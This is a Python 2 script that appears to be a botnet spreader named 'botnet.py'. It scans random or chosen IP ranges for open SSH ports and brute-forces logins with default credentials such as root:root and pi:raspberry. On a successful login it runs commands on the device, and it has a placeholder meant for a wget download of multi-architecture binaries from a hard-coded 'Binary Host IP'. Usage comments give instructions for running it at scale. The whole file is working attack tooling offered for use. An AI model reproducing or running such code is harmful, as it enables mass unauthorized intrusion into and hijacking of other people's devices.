#!/usr/bin/env python# -*- coding: utf-8 -*- # ulimit -n 999999; ulimit -u

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3.  
4. # ulimit -n 999999; ulimit -u 999999
5. # sysctl -w fs.file-max=100000
6. # python botnet.py 376 LUCKY x 0 (LUCKY RANGES)
7. # python botnet.py 376 B 113.53 1 (SCANNER EXAMPLE)
8. # python botnet.py 376 RAND x all (IP RANDOMIZATION)
9. # 113.53, 125.26, 125.27, 125,
10.  
11. import threading, paramiko, random, socket, time, sys
12.  
13. paramiko.util.log_to_file("/dev/null") # silents spam of paramiko
14.  
15. files = [ # Binary names
16.  
17. "mipsel",
18. "mips",
19. "sh4",
20. "x86_64",
21. "armv6l",
22. "i686",
23. "powerpc",
24. "i586",
25. "m86k",
26. "sparc",
27.  
28. ]
29.  
30. website = "185.112.249.253" # Binary Host IP
31.  
32. reservedips = [
33. 'http://127.',
34. 'http://0',
35. 'http://10.',
36. 'http://100.64',
37. 'http://100.65',
38. 'http://100.66',
39. 'http://100.67',
40. 'http://100.68',
41. 'http://100.69',
42. 'http://100.70',
43. 'http://100.71',
44. 'http://100.72',
45. 'http://100.73',
46. 'http://100.74',
47. 'http://100.75',
48. 'http://100.76',
49. 'http://100.77',
50. 'http://100.78',
51. 'http://100.79',
52. 'http://100.80',
53. 'http://100.81',
54. 'http://100.82',
55. 'http://100.83',
56. 'http://100.84',
57. 'http://100.85',
58. 'http://100.86',
59. 'http://100.87',
60. 'http://100.88',
61. 'http://100.89',
62. 'http://100.90',
63. 'http://100.91',
64. 'http://100.92',
65. 'http://100.93',
66. 'http://100.94',
67. 'http://100.95',
68. 'http://100.96',
69. 'http://100.97',
70. 'http://100.98',
71. 'http://100.99',
72. 'http://100.100',
73. 'http://100.101',
74. 'http://100.102',
75. 'http://100.103',
76. 'http://100.104',
77. 'http://100.105',
78. 'http://100.106',
79. 'http://100.107',
80. 'http://100.108',
81. 'http://100.109',
82. 'http://100.110',
83. 'http://100.111',
84. 'http://100.112',
85. 'http://100.113',
86. 'http://100.114',
87. 'http://100.115',
88. 'http://100.116',
89. 'http://100.117',
90. 'http://100.118',
91. 'http://100.119',
92. 'http://100.120',
93. 'http://100.121',
94. 'http://100.122',
95. 'http://100.123',
96. 'http://100.124',
97. 'http://100.125',
98. 'http://100.126',
99. 'http://100.127',
100. 'http://169.254',
101. 'http://172.16.',
102. 'http://172.17.',
103. 'http://172.18.',
104. 'http://172.19.',
105. 'http://172.20.',
106. 'http://172.21.',
107. 'http://172.22.',
108. 'http://172.23.',
109. 'http://172.24.',
110. 'http://172.25.',
111. 'http://172.26.',
112. 'http://172.27.',
113. 'http://172.28.',
114. 'http://172.29.',
115. 'http://172.30.',
116. 'http://172.32.',
117. 'http://192.0.0.0',
118. 'http://192.0.0.1',
119. 'http://192.0.0.2',
120. 'http://192.0.0.3',
121. 'http://192.0.0.4',
122. 'http://192.0.0.5',
123. 'http://192.0.0.6',
124. 'http://192.0.0.7',
125. 'http://192.0.2.',
126. 'http://192.88.99.',
127. 'http://192.168.',
128. 'http://198.18.',
129. 'http://198.19.',
130. 'http://198.51.100.',
131. 'http://203.0.113.',
132. 'http://224.',
133. 'http://225'
134. ]
135.  
136.  
137. passwords = [ # perls/la
138. "root:root",
139. "root:admin",
140. "admin:admin",
141. "ubnt:ubnt"
142. "root:1234",
143. "admin:1234",
144. "guest:guest",
145. "user:user",
146. "test:test",
147. "pi:raspberry",
148. "vagrant:vagrant"
149. ]
150.  
151.  
152. print sys.argv[0]+' <Threads(MAX: 376)> <A/B/C/ (IP Class)> <Range> <1(slow but effective)/2(fast but less effective)/perl(scans for perlbots/all(scans for everything!>'
153.  
154. if sys.argv[4] == '1':
155. passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
156. if sys.argv[4] == '2':
157. passwords = [ "root:root", "admin:admin" ] #Fast but yet less effective
158. if sys.argv[4] == 'perl':
159. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] #perl scanner
160. if sys.argv[4] == 'all':
161. passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow
162.  
163. ipclassinfo = sys.argv[2]
164. if ipclassinfo == "A":
165. ip1 = sys.argv[3]
166. elif ipclassinfo == "B":
167. ip1 = sys.argv[3].split(".")[0]
168. ip2 = sys.argv[3].split(".")[1]
169. elif ipclassinfo == "C":
170. ips = sys.argv[3].split(".")
171. num=0
172. for ip in ips:
173. num=num+1
174. if num == 1:
175. ip1 = ip
176. elif num == 2:
177. ip2 = ip
178. elif num == 3:
179. ip3 = ip
180. class sshscanner(threading.Thread):
181. global passwords
182. global ipclassinfo
183. if ipclassinfo == "A":
184. global ip1
185. elif ipclassinfo == "B":
186. global ip1
187. global ip2
188. elif ipclassinfo == "C":
189. global ip1
190. global ip2
191. global ip3
192. def run(self):
193. while 1:
194. try:
195. while 1:
196. thisipisbad='no'
197. if ipclassinfo == "A":
198. self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
199. elif ipclassinfo == "B":
200. self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
201. elif ipclassinfo == "C":
202. self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
203. elif ipclassinfo == "LUCKY":
204. lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97","125.17"]
205. self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
206. else:
207. self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
208. for badip in reservedips:
209. if badip in self.host:
210. thisipisbad='yes'
211. if thisipisbad=='no':
212. break
213. self.host=self.host.replace('http://', '')
214. username='root'
215. password="0"
216. port = 22
217. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
218. s.settimeout(3)
219. s.connect((self.host, port))
220. s.close()
221. ssh = paramiko.SSHClient()
222. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
223. dobreak=False
224. for passwd in passwords:
225. if ":n/a" in passwd:
226. password=""
227. else:
228. password=passwd.split(":")[1]
229. if "n/a:" in passwd:
230. username=""
231. else:
232. username=passwd.split(":")[0]
233. try:
234. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
235. dobreak=True
236. break
237. except:
238. pass
239. if True == dobreak:
240. break
241. badserver=True
242. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
243. output = stdout.read()
244. if "inet addr" in output:
245. badserver=False
246. websites = [ ]
247. if badserver == False:
248. print 'Adding:'+username+'<'+password+'>'+self.host+'|'+str(port)
249. ssh.exec_command("put ur wget here ignore the shit up top.") #la
250.  
251. time.sleep(15)
252. ssh.close()
253. except:
254. pass
255.  
256. for x in range(0,int(sys.argv[1])):
257. try:
258. t = sshscanner()
259. t.start()
260. except:
261. pass